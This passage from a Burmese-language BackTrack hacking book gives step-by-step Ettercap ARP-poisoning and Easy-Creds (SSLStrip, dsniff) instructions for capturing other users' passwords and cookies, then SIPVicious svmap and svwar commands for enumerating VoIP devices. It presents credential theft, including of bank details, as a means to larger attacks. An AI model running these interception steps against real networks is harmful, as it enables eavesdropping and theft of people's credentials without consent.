ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

ettercap -G

မ်က္ပြင့္စာေပ 209
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ လုပ္ေဆာင္ခ်က္ကိုစတင္ရန္အတြက္ Unified Sniffing ကိုဖြင့္ေပးရပါမည္။ ထိုသို႕ဖြင့္ရန္အတြက္ Shift


+U ကိုတႏ
ြဲ ိွပ္၍ျဖစ္ေစ၊ Menu မွ Sniff> Unified Sniffing ကိုေရြးခ်ယ္ျခင္းျဖင့္ျဖစ္ေစ ျပဳလုပ္ေပးရပါမည္။

၃။ Network Interfae ကိုသတ္မွတ္ေပးရပါမည္။ ယခုတြင္ MITM attack ကိုအသံုးျပဳထားပါသည္။


ထိုသို႕အသံုးျပဳရန္ Network Interface ကို သတ္မွတ္ေပးရပါမည္။

210 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ ထိ႕ု ေနာက္ Scan for hosts ကိုဖြင့္ရပါမည္။ ထိုိသို႕ျပဳလုပ္ရန္ Ctrl +S ကိုတြႏ


ဲ ိွပ္ျခင္း သို႕မဟုတ္ Hosts
>Scan for hosts ကိုေရြးခ်ယ္ျခင္းျဖင့္လည္းေကာင္း ေရြးခ်ယ္ေပးေစႏိုင္မည္ျဖစ္သည္။

၅။ ထိ႕ု ေနာက္ Hosts List မ်ားကို ေခၚယူရမည္။ Keyboard မွ H ကိုႏိွပ္ျခင္းသို႕မဟုတ္ Hosts> Host List
ကိုေရြးခ်ယ္ျခင္းျဖင့္ Host List ကိုေခၚယူႏိုင္မည္ျဖစ္သည္။

၆။ ေနာက္တစ္ဆင့္အရ Target မ်ားကို သတ္မွတ္ေပးရန္လုိမည္ျဖစ္သည္။ ယခုေနရာတြင္ 192.168.


10.111 ကို Target အျဖစ္ေရြးခ်ယ္ထားပါသည္။ ၄င္းသည္ Target 1 အျဖစ္ Highlight ျဖစ္ေနမည္ျဖစ္ၿပီး
Add to Target 1 ခလုတ္ကို ႏိွပ္ေပးရမည္။

မ်က္ပြင့္စာေပ 211
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၇။ Sniffing ကိုစတင္ရန္အတြက္ Ettercap ကို Allow လုပ္ထားရပါမည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Ctrl +W


ကိုတြႏ
ဲ ိွပ္၍ေသာ္လည္းေကာင္း Start> Start Sniffing ကိုေရြးခ်ယ္၍ေသာ္လည္းေကာင္း ျပဳလုပ္ႏိုင္ပါ
သည္။

၈။ ေနာက္ဆံုးအဆင့္အေနျဖင့္ ARP poisoning process ကိုစတင္ေပးရမည္။ စတင္ရန္အတြက္ Mitm>


ARP Poisoning ကိုေရြးခ်ယ္ေပးရပါမည္။

၉။ ေအာက္ပါပံုအတိုင္းေပၚလာေသာအခါတြင္ Sniff Remote Connections ကိုေရြးခ်ယ္အမွန္ျခစ္ေပးရပါ


မည္။

၁၀။ Network traffic အေပၚတြင္မူတည္၍ ေအာက္ပါပံုအတိုင္း information မ်ားကိုေတြ႕ျမင္ရမည္ျဖစ္


သည္။

212 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၁။ ထို႕ေနာက္ ရွာေဖြေနေသာ Username မ်ားႏွင့္ Password မ်ားကိုေတြ႕ရိွရေသာအခါတြင္ Ettercap


ကိုပိတ္ေပးရမည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ Ctrl +E ကိုတႏ
ြဲ ိွပ္ျခင္း သို႕မဟုတ္ Menu ထဲမွ Start> Stop
Sniffing ကို ေရြးခ်ယ္ေပးျခင္းျဖင့္ ပိတ္ေပးႏိုင္သည္။

၁၂။ ARP poisoning ကိုပိတ္ရန္လိုအပ္ၿပီး Network ကို Normal အတိုင္းျပန္ထားေပးရမည္။

မ်က္ပြင့္စာေပ 213
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕လွ်င္ MIMT attack ကို ARP packet poisoning ကိုအသံုးျပဳ၍


Wireless Communication ထုတ္လႊင့္မႈကို အသံုးျပဳသူတစ္ေယာက္မွ ၾကား၀င္ခိုးယူ(eavesdrop) ျပဳလုပ္
ျခင္းျဖစ္သည္။ ယခုအပိုင္းကိုစတင္ရန္အတြက္ Ettercap ကိုအသံုးျပဳခဲ့ၿပီး ေရွးဦးစြာ Host မ်ားကို Scan
ျပဳလုပ္ခဲ့ရပါသည္။ ထို႕ေနာက္ ARP poisoning လုပ္ငန္းစဥ္ျဖင့္ Network ကိုစတင္ attack ျပဳလုပ္ပါ သည္။
ARP poisoning ဆိုသည္မွာ Local Network ေပၚတြင္ အသံုးျပဳသူထံသို႕ Spoofed ARP message
မ်ားကိုေပးပို႕ခြင့္ျပဳေပးရန္ လုပ္ေဆာင္ရသည္႕နည္းစနစ္တစ္ခုလည္းျဖစ္ပါသည္။

Packet Sniffing ကိုစတင္ျခင္းမ်ား၊ ARP poison ျပဳလုပ္ေနျခင္းကို ရပ္တန္႕ျခင္း၊ Network ကို ပံုမွန္
အတိုင္းျပန္လည္ေရာက္ရိွေစျခင္းတို႕ကို ေဖာ္ျပခဲ့ပါသည္။ ယခုအဆင့္သည္ အေရးႀကီးဆံုးျဖစ္ၿပီး Network
အရည္အေသြးက်ဆင္းျခင္းကို ေရွာင္လႊဲရန္အတြက္ Network poisoning လုပ္ငန္းစဥ္ကို မရပ္မျဖစ္
ရပ္တန္႕ေပးရပါမည္။

Wireless Network မွ ထုတ္လႊင့္မႈမ်ားကို ဖမ္းယူျခင္းလုပ္ငန္းစဥ္သည္ Information မ်ားကိုစုေဆာင္းျခင္း


လုပ္ငန္းစဥ္တြင္ အသံုး၀င္ေစႏိုင္သည္။ Traffic အေပၚမူတည္၍ Username မ်ား။ Password မ်ား၊ Bank
Account ႏွင့္ဆိုေသာအခ်က္အလက္မ်ားႏွင့္ အျခားေသာ Information မ်ားကို Network မွ Target
ကိုလမ္းလႊဲပို႕ျခင္းျဖင့္ ရယူႏိုင္မည္ျဖစ္သည္။ ယင္းအခ်က္အလက္မ်ားကို Springboard ကဲ့သို႕ေသာ
အႀကီးစား attack လုပ္မႈမ်ားအတြက္ အသံုးျပဳႏိုင္သည္။

Accessing an e-mail by stealing cookies


Cookie ဆိုသည္မွာမ်ားေသာအားျဖင့္ အေသးစား Data ဖိုင္တစ္ဖိုင္ျဖစ္ၿပီး အသံုးျပဳ၏ကြန္ပ်ဴတာ တြင္
Website တစ္ခုသို႕၀င္ေရာက္ၾကည္႕ရွဳစဥ္အတြင္းတြင္ ထို Website ႏွင့္ဆိုင္ေသာ Information မ်ားကို
သိမ္းဆည္းလိုသည္႕ရည္ရြယ္ခ်က္ျဖင့္ Website မွပ႕ို လႊတ္ေပးထားေသာ ဖိုင္တစ္ဖိုင္လည္းျဖစ္ သည္။
ေယဘုယ်အားျဖင့္ ယင္း Information မ်ားကို Website မွအသံုးျပဳျခင္းျဖစ္ၿပီး အကယ္၍ မၾကာမီ တြင္ထို
Cookie ရိွေသာ Website ကုိသာထပ္မံ၀င္ေရာက္ခဲ့ပါက ထို Information မ်ားကိုအသံုးျပဳျခင္းျဖင့္
အခ်ိန္မကုန္ေအာင္ ျပဳလုပ္ရန္ရည္ရြယ္ထားျခင္းျဖစ္ပါသည္။ အခ်ိဳ႕ေသာ Cookie မ်ားသည္ Username
မ်ားႏွင့္ Encrypted ျပဳလုပ္ထားေသာ Password မ်ားကိုသိမ္းဆည္းေပးထားၿပီး မၾကာခဏ Password

214 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ေတာင္းသည္႕ Website မ်ား (Gmail, Facebook) မ်ားတြင္ Remember Password Option ကိုအသံုးျပဳ
ခြင့္ေပးသည္႕သေဘာပင္ျဖစ္သည္။

ယခုအပိုင္းတြင္ Network တြင္အသံုးျပဳခဲ့ၾကေသာ အသံုးျပဳသူမ်ားထံမွ Cookie မ်ားကိုခိုးယူရန္ အတြက္


Easy Credentials ကိုအသံုးျပဳမည္ျဖစ္သည္။ Easy Credentials (Easy-creds as its commonly
reffered) သည္ Bash Script တစ္ခုျဖစ္ၿပီး Ettercap, URLStrip, SSLStrip ႏွင့္အျခားေသာ User
Credential မ်ားကို ရယူႏိုင္မည္႕လုပ္ေဆာင္ခ်က္မ်ားကို Automate ျပဳလုပ္ႏိုင္ေစသည္႕ Tool မ်ား
ကိုအသံုးျပဳေစပါသည္။ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ေဖာ္ျပေပးမည္ျဖစ္သည္။

၁။ Termianl Window ကိုဖြင့္ၿပီး Easy Credentials ပါ၀င္ေသာ ဖိုဒါကိုလည္းဖြင့္ရပါမည္။

၂။ SH file ကိုဖြင့္ျခင္းျဖင့္ Easy Credentials ကိုစတင္ႏိုင္ပါသည္။ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

./easy-creds.sh

၃။ အထက္တြင္ေဖာ္ျပထားေသာပံုအရ Main Menu တြင္ေရြးခ်ယ္္ႏိုင္ေသာ Option မ်ားကိုေတြ႕ျမင္ရမည္


ျဖစ္သည္။ ပါ၀င္ေသာ Option မ်ားမွာ

 Prerequisites & Configurations


မ်က္ပြင့္စာေပ 215
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Poisoning Attacks
 FakeAP Attack
 Data Review
 Exit
 Quit Current Poisoning Session တို႕ျဖစ္ပါသည္။

၄။ Poisoning Attacks ကိုေရြးခ်ယ္မည္ျဖစ္သည္႕အတြက္ 2 ဟုရိုက္ထည္႕ၿပီး Enter ႏိွပ္ပါ။

၅။ ထိ႕ု ေနာက္ ေပၚလာေသာ Menu Screen ေပၚတြင္ Oneway ARP Poisoning ကိုေရြးခ်ယ္ရန္အတြက္ 3
ဟုရိုက္ထည္႕၍ Enter ႏိွပ္ပါ။ ယခု Screen တြင္ေပၚလာမည္႕ Menu Option မ်ားမွာ

 Create Victim Host List


 Standard ARP Poison
 DHCP Poison
 DNS Poison
 ICMP Poison
 Previous Menu တိ႕ု ျဖစ္ပါသည္။

216 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ အထက္ပါပံုအတိုင္း Interface ကိုေရြးခ်ယ္ခိုင္းလွ်င္ Wireless Card ကိုေရြးခ်ယ္ေပးရပါမည္။ ထိုသို႕


ေရြးခ်ယ္ရန္အတြက္ Wlan0 ဟုရိုက္ထည္႕ၿပီး Enter ႏိွပ္ပါ။

wlan0

၇။ Provide path for Saving log files အတြက္ Location ကိုေရြးခ်ယ္ေပးရပါမည္။ ထို႕ေၾကာင့္ ./root
/Easy-Creds ဟူေသာ Path ကိုေရြးခ်ယ္ေပးပါ။

/root/Easy-Creds

၈။ Easy Credentials သည္ IP TABLES ကို Set up ျပဳလုပ္ခိုင္းမည္ျဖစ္သည္။ Do you have a populated
file of victims to use ဟုေဖာ္ျပလာပါက n ဟုသာရိုက္ထည္႕ေပးရပါမည္။

၉။ ထို႕ေနာက္ Gateway ၏ IP Address ကိုထည္႕သြင္းေပးရပါမည္။ ယခုေနရာတြင္ 192.168.10.1 ကို


သံုးျပထားပါသည္။ အသံုးျပဳသူမ်ားအတြက္ သက္ဆိုင္သည္႕ IP Address ကိုသာထည္႕သြင္းေပးရပါမည္။

192.168.10.1

မ်က္ပြင့္စာေပ 217
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ Poison ျပဳလုပ္မည္႕ IP Range ကိုထည္႕သြင္းေပးရပါမည္။ အသံုးျပဳသူသည္ IP အေနျဖင့္


192.168.10.115 အတြင္းတြင္ရိွလွ်င္ ေအာက္ပါအတိုင္း ရိုက္ထည္႕ေပးရပါမည္။

192.168.10.115

၁၁။ Would you like to include a sidejacking attack ဟုေမးလာခဲ့ပါက n ကိုရိုက္ၿပီး Enter ကိုသာ ႏိွပ္ပါ။

၁၂။ ေနာက္ဆံုးအေနျဖင့္ SSLStrip, Ettercap, URL Snarf ႏွင့္ Dsniff တိ႕ု ကို Easy Credentials မွ
လုပ္ေဆာင္ေနမည္ျဖစ္သည္။

218 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၃။ အသံုးျပဳသူမွ Website မ်ားကို၀င္ေရာက္အသံုးျပဳေသာအခါ Ettercap Window တြင္ Username ႏွင့္


Password တို႕ကို အသံုးျပဳေသာ Location အလိုက္ေတြ႕ရိွရမည္ျဖစ္သည္။ အခ်ိန္ၾကာၾကာ Attack
လုပ္ထားေလေလ ပိုမိုမ်ားျပားေသာ Information မ်ားကို စုေဆာင္းမိေလေလပင္ျဖစ္ပါသည္။

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕လွ်င္ ယခုအပိုင္းတြင္ Easy Credentials ကိုအသံုးျပဳ၍ Cookie မ်ား


ခိုးယူျခင္းကို ေလ့လာခဲ့ၾကပါသည္။ Easy Credentials ကို Command ရိုက္ထည္႕ျခင္းျဖင့္ စတင္ခဲ့ပါ သည္။
ပြင့္လာေသာ Menu Screen တြင္ Poisoning attack ကို ေရြးခ်ယ္ခဲ့ၾကပါသည္။ Configuration
ျပဳလုပ္ျခင္းအရ Easy Credentials သည္ Program ၄ခုကိုအသံုးျပဳထားပါသည္။ ယင္းတို႕မွာ

 Ettercap : Networking Tool တစ္ခုျဖစ္ၿပီး man-in-the-middle (MITM) attack


ျပဳလုပ္ျခင္းကိုလုပ္ေဆာင္ႏိုင္ေစသည္။
 Dsniff : Username ႏွင့္ Password ကို Sniff ျပဳလုပ္ႏိုင္မည္႕ Application တစ္ခုျဖစ္ၿပီး
(Arpspoof, dnsspoof ႏွင့္အျခားေသာ Application ကဲ့သို႕ Sister Suite of Application
မ်ားျဖစ္ၿပီး Network Traffic Analysis လုပ္ျခင္းကိုလည္း ထို Application
မ်ားနည္းတူလုပ္ေဆာင္ႏိုင္ေစပါသည္။
 URL Snarf : ၄င္းသည္ Common Log Format (CLF) သို႕ Request လုပ္ေဆာင္ျခင္း
ခံရေသာ URL မ်ားကို ပိုမိုလြယ္ကူေစရန္ လုပ္ေဆာင္ႏိုင္ပါသည္။



မ်က္ပြင့္စာေပ 219
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

220 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 8

Voice over IP (VoIP)


Voice over IP (VoIP) အေၾကာင္းသိေကာင္းစရာ

မ်က္ပြင့္စာေပ 221
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction

ယခုအခန္းတြင္ VoIP network မ်ားကို ထုိးေဖာက္မႈမ်ားကို စမ္းသပ္ရန္အတြက္ နည္းလမ္းမ်ားကို ေဖာ္ျပ


ေပးမည္ျဖစ္သည္။ Voice over Internet Protocol (VoIP) နည္းပညာသည္ Data Network (Internet)
အေပၚ တြင္ Voice Call မ်ားကိုဖန္တီးႏိုင္ေအာင္ ျပဳလုပ္ခြင့္ေပးထားပါသည္။ ေယဘုယ်အားျဖင့္ေျပာရလွ်င္
Private Branch Exchange (PBX) System ကို အစစ္အမွန္ ဖုန္းသို႕မဟုတ္ Soft ဖုန္း (Software Phone)
မ်ား၏နံပါတ္တစ္ခုႏွင့္ ခ်ိတ္ဆက္ထားပါသည္။ PBX တစ္ခုသည္ Internal Network ႏွင့္ Phone Carrier
တို႕အၾကားတြင္ Bridge တစ္ခုသဖြယ္လုပ္ေဆာင္ေပးၿပီး Call Waiting, Call Forwarding, Voicemail ႏွင့္
အျခားေသာ ဖုန္း Feature မ်ားကို ရရိွရန္အတြက္ Phone Extension မ်ားကို ခြင့္ျပဳေပးေစပါသည္။

ယခုအခန္းတြင္ VoIP ႏွင့္ပတ္သက္ေသာ အပိုင္းမ်ားကိုေလ့လာရမည္ျဖစ္ၿပီး ေလ့လာရမည္႕ က႑မ်ားမွာ


ေအာက္ပါအတိုင္းျဖစ္ပါသည္။

 Using Svmap
 Finding valid extensions
 Monitoring, Catpuring, and eavesdropping on VoIP traffic
 Using VoIPong
 Mastering UCSniff
 Mastering Xplico
 Capturing SIP authentication
 Mastering VoIP Hopper
 Causing a denial of service
 Attacking VoIP using Metasploit
 Sniffing DECT phones ဟူေသာ က႑မ်ားျဖစ္ပါသည္။ ထိ႕ု ေၾကာင့္ စတင္၍ Svmap ကို
အသံုးျပဳျခင္း (Using Svmap) ကိုစတင္ေလ့လာၾကည္႕ၾကပါမည္။

222 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Using Svmap
ယခုအပိုင္းတြင္ Svmap ကုိအသံုးျပဳ၍ Target Network အတြင္းမွ SIP ႏွင့္ PBX Device မ်ားကို ေဖာ္ထုတ္
အသံုးျပဳျခင္းကို ေလ့လာၾကည္႕ၾကပါမည္။ Svmap သည္ Network ေပၚမွ အားလံုးေသာ Device မ်ား၏
စာရင္းကိုျပဳလုပ္ရန္အတြက္လည္း အသံုးျပဳႏိုင္ပါသည္။ Svmap သည္ VoIP စနစ္မ်ားကို စစ္ေဆးရန္ႏွင့္
Network မ်ားကိုေထာက္ပံ့ေပးေသာ Protocol တစ္ခုအျဖစ္ Python ျဖင့္ဖန္တီးထားေသာ Tools မ်ားျဖစ္
ေသာ SIPVicious Suite ၏ အစိတ္အပိုင္းတစ္ခုလည္းျဖစ္ပါသည္။

Svmap သည္ ေအာက္တြင္ေဖာ္ျပထားေသာ အလုပ္မ်ားကို လုပ္ေဆာင္ႏိုင္စြမ္းရိွပါသည္။

 Svmap သည္ SIP Device မ်ား၏ ပံုမွန္ Port Setting မ်ား သို႕မဟုတ္ ပံုမွန္မဟုတ္ေသာ
Settings မ်ားကိုအသံုးျပဳ၍ SIP Device မ်ားတြင္ အသံုးျပဳေစႏိုင္ပါသည္။ ထို Feature
သည္ ထုတ္လုပ္သူမ်ားမွ သတ္မွတ္ေပးလိုက္ေသာ နဂို Network မ်ားကို ေက်ာ္လြန္၍
ကြျဲ ပားေသာ Ports မ်ားကိုအသံုးျပဳေသာ ကိစၥရပ္မ်ားတြင္ အသံုး၀င္ေစႏိုင္ပါသည္။
 Svmap သည္ တစ္ခုထက္ပိုမိုေသာ Host မ်ားႏွင့္ Port မ်ား သို႕မဟုတ္ တစ္ခုထက္ပိုမို
ေသာ Port မ်ားကိုစစ္ေဆးမည္႕ Host တစ္ခုေပၚတြင္ SIP device မ်ားကို ေနရာခ်ထား
အသံုးျပဳေစႏိုင္ပါသည္။ ၄င္းလုပ္ေဆာင္ခ်က္သည္ အလြန္ႀကီးမားေသာ Network Layout
မ်ားတြင္အသံုးျပဳရန္အတြက္ အလြန္သင့္ေလွ်ာ္ေစပါသည္။
 ယခင္က စစ္ေဆးထားေသာ Scan ျပဳလုပ္မႈမ်ားကို ျပန္လည္စတင္ေစႏိုင္ပါသည္။ ၄င္း
လုပ္ေဆာင္ခ်က္သည္ အေၾကာင္းတစ္ခုခုေၾကာင့္ Program ေမာင္းႏွင္ထားျခင္းကို ရပ္
တန္႕လိုေသာအခါ အသံုးျပဳႏိုင္ပါသည္။ ထိုသို႕ရပ္တန္႕ထားေသာ Program ကိုအခ်ိန္မ
ေရြးျပန္လည္စတင္ေစႏိုင္ပါသည္။

ယခုေဖာ္ျပထားေသာအျခင္းအရာမ်ားကိုလုပ္ေဆာင္ရန္အတြက္ ေအာက္ပါအခ်က္မ်ားႏွင့္ ၿပည္႕စံုရပါမည္။

 ယခုအပိုင္းကို ၿပီးၿပည္႕စံုစြာျပဳလုပ္ႏိုင္ရန္အတြက္ Internet သို႕မဟုတ္ Intranet ကို လို


အပ္ပါလိမ့္မည္။
 အသံုးျပဳမည္႕ Network တြင္ SIP သိ႕ု မဟုတ္ PBX device မ်ားကိုလည္း လိုအပ္ပါမည္။

မ်က္ပြင့္စာေပ 223
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Svmap ကို စတင္ရန္အတြက္ Target Network မွ SIP device မ်ားကို အဆင္သင့္ျပဳလုပ္ထားရပါမည္။

၁။ Terminal Window ကိုဖြင့္၍ Svmap ရိွသည္႕ Directory ရိွသည္႕လမ္းေၾကာင္းသို႕ ေျပာင္းလဲေပးထား


ရပါမည္။ ေအာက္ပါ Command ကိုေလ့လာၾကည္႕ပါ။

cd /pentest/voip/sipvicious

၂။ ထို႕ေနာက္ ေအာက္ပါ Command ကိုအသံုးျပဳျခင္းျဖင့္ Svmap help ဖိုင္ကို ေခၚယူရပါမည္။

./svmap.py –h

၃။ Mapping ျပဳလုပ္ျခင္းကို စတင္ရပါမည္။ ထို႕ေၾကာင့္ 192.168.10.100 မွ 192.168.10.150 အထိ


ရိွေသာ Network IP Range ကို map လုပ္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

./svmap 192.168.10.100 – 192.168.10.150

224 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ အျပန္အလွန္အားျဖင့္ Network ေပၚတြင္ရိွေသာ Device မ်ားကိုရွာေဖြရန္အတြက္ အျခားနည္းလမ္းမ်ား


ျဖင့္လည္း Network ကို Scan ျပဳလုပ္ႏိုင္ပါသည္။

 IP address မ်ား၏ Range ကိုသတ္မွတ္ရန္အတြက္ ေအာက္ေဖာ္ျပပါ Command အတုိင္း အသံုး


ျပဳ၍ လြယ္ကူေသာ နည္းလမ္းျဖင့္လည္း လုပ္ေဆာင္ႏိုင္ပါသည္။
./svmap 192.168.10.100-120
 သတ္မွတ္ထားေသာ Domain မွ အားလံုးေသာ IP Address မ်ားကို Scan ျပဳလုပ္ရန္အတြက္ Scan
Method ကိုလည္း အသံုးျပဳႏိုင္ပါသည္။ ေအာက္တြင္ေဖာ္ျပထားေသာ ဥပမာကို ေလ့လာပါ။
./svmap targetdomainnamegoeshere.com

ယခုအပိုင္းတြင္ Svmap ကိုအသံုးျပဳ၍ Target Network မွ SIP ႏွင့္ PBX device မ်ားကို Scan ျပဳလုပ္ျခင္း
ကိုလုပ္ေဆာင္ခဲ့ပါသည္။ Network ေပၚမွ Devices မ်ား၏ အခ်က္အလက္မ်ားကို စူးစမ္းႏိုင္ေစရန္
ကင္းေထာက္ျခင္းလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ျခင္းျဖစ္သည္႕အတြက္ ယခုလုပ္ေဆာင္ခ်က္ကို အေရးႀကီး
သည္ဟုသတ္မွတ္ႏိုင္ပါသည္။ ေဖာ္ျပပါ ရည္ရြယ္ခ်က္အတြက္ Sipflanker ကဲ့သို႕ေသာ Tool မ်ားကို
အသံုးျပဳႏိုင္ေသာ္လည္း Svmap ကို လွ်င္ျမန္ေသာ စစ္ေဆးျခင္းမ်ားကိုျပဳလုပ္ႏိုင္ေစရန္ ဒီဇိုင္းဆြထ
ဲ ားေသာ
ေၾကာင့္ အသံုးျပဳရအေကာင္းဆံုး Tool တစ္ခုျဖစ္လာေစပါသည္။

မွတ္ရန္။ ။ Svmap ကိုယခုထက္ပိုမိုသိရိွေလ့လာႏိုင္ရန္အတြက္ Http://code.google.com/p/


sipvicious/wiki/SvmapUsage တြင္ေလ့လာႏိုင္ပါသည္။

Finding valid extensions


VoIP ဖုန္းမ်ားကို Attack ျပဳလုပ္ရန္ ႀကိဳးပမ္းေသာအခါတြင္ Network အတြင္းတြင္ အမွန္တကယ္ရိွေသာ
ဖုန္းမ်ားဟုတ္၊ မဟုတ္ စစ္ေဆးရန္လိုအပ္ပါသည္။ ယခုအပိုင္းတြင္ Svwar ကိုအသံုးျပဳ၍ Network တစ္ခု
မွ Valid Extension မ်ားဟုတ္၊ မဟုတ္ စစ္ေဆးျခင္းကို လုပ္ေဆာင္ၾကည္႕ၾကမည္။ Svwar သည္ Svmap
အတိုင္းပင္ Python ျဖင့္ျပဳလုပ္ထားေသာ SIPVicious Suite ၏ အစိတ္အပိုင္းတစ္ခုပင္ျဖစ္ပါသည္။

Svwar သည္ ေအာက္ပါ အလုပ္မ်ားကို ေထာက္ပံ့ေပးပါသည္။

 SIP Proxy မ်ားကိုျဖတ္သန္း၍ PBX extension မ်ားကို စစ္ေဆးေပးႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 225
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 နံပါတ္ပံုစံ (Numerical format) ျဖင့္ေရးသားထားေသာ ႀကီးမားေသာ Extension Range


မ်ားကို စစ္ေဆးေပးႏိုင္ပါသည္။
 ယခင္စစ္ေဆးမႈမ်ားကို ေရွ႕ဆက္ေပးႏိုင္ပါသည္။ ထို လုပ္ေဆာင္ခ်က္သည္ Program ကို
အေၾကာင္းတစ္ခုခုေၾကာင့္ ရပ္တန္႕ရန္လိုအပ္ေသာအခါတြင္ အသံုး၀င္ေစပါသည္။

စတင္လုပ္ေဆာင္ရန္အတြက္ ေအာက္ပါအခ်က္မ်ားျဖင့္ ျပည္႕စံုရန္ လိုအပ္ပါသည္။

 အသံုးျပဳရန္အတြက္ Internet သို႕မဟုတ္ Intranet Connection တစ္ခုကို အသံုးျပဳရပါ


မည္။
 Network ေပၚမွ SIP သိ႕ု မဟုတ္ PBX Device မ်ားကို လိုအပ္ပါမည္။

စတင္၍ Target ေပၚတြင္ Extension မ်ားကို စစ္ေဆးျခင္းကို Svwar ကိုအသံုးျပဳ၍ စတင္လုပ္ေဆာင္


ၾကည္႕ၾကပါမည္။

၁။ Terminal Window ကိုဖြင့္၍ Svwar ရိွရာ Directory လမ္းေၾကာင္းသို႕ ေအာက္ပါ Command ကိုအသံုး
ျပဳ၍ ညႊန္းေပးရပါမည္။

cd /pentest/voip/sipvicious

၂။ ထို႕ေနာက္ Svwar Help ဖိုင္ကို ဖြင့္လွစ္ရပါမည္။

./svwar.py –h

226 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ထို႕ေနာက္ Svwar ကို စတင္အသံုးျပဳရပါမည္။ ၄င္းတြင္ အသံုးမ်ားေသာ Option ႏွစ္ခုရိွပါသည္။ ၄င္းတို႕


ကို ေအာက္တြင္ေဖာ္ျပထားပါသည္။

 -e : ထို Option သည္ Extension မ်ား၏ Range ကိုသတ္မွတ္ရန္အတြက္ အသံုးျပဳပါသည္။


 -d : ထို Option သည္ Extension မ်ား၏ Setting မ်ားအတြက္ Dictionary File မ်ားကို အသံုးျပဳ
ႏိုင္ရန္အတြက္ အေထာက္အပံံ့ျဖစ္ေစပါသည္။

./svwar.py –e001-1000 192.168.10.100

ယခုအပိုင္းတြင္ Target Network အတြင္းတြင္ Svwar ကိုအသံုးျပဳ၍ Extension မ်ားကို Locate ျပဳလုပ္
ျခင္းကိုေဖာ္ျပခဲ့ပါသည္။ Network ေပၚမွ Devices မ်ား၏ အခ်က္အလက္မ်ားကို စူးစမ္းႏိုင္ေစရန္
ကင္းေထာက္ျခင္းလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ျခင္းျဖစ္သည္႕အတြက္ ယခုလုပ္ေဆာင္ခ်က္ကို အေရးႀကီး
သည္ဟုသတ္မွတ္ႏိုင္ပါသည္။ ယခုအပိုင္းတြင္ Svwar ရိွသည္႕ Directory ကိုညႊန္းဆိုသည္႕ လုပ္ေဆာင္
ခ်က္ႏွင့္ စတင္ခဲ့ၿပီး Target Network ေပၚတြင္ Extension မ်ားကို Identify ျပဳလုပ္ရန္ Svwar ကိုအသံုး
ျပဳရမည္႕ လုပ္ေဆာင္ခ်က္မ်ားကို ေဖာ္ျပခဲ့ပါသည္။

မွတ္ခ်က္။ ။SIPVicious ႏွင့္ပတ္သက္ေသာ လုပ္ေဆာင္ခ်က္မ်ားကို ပိုမိုသိရိွႏိုင္ေစရန္အတြက္


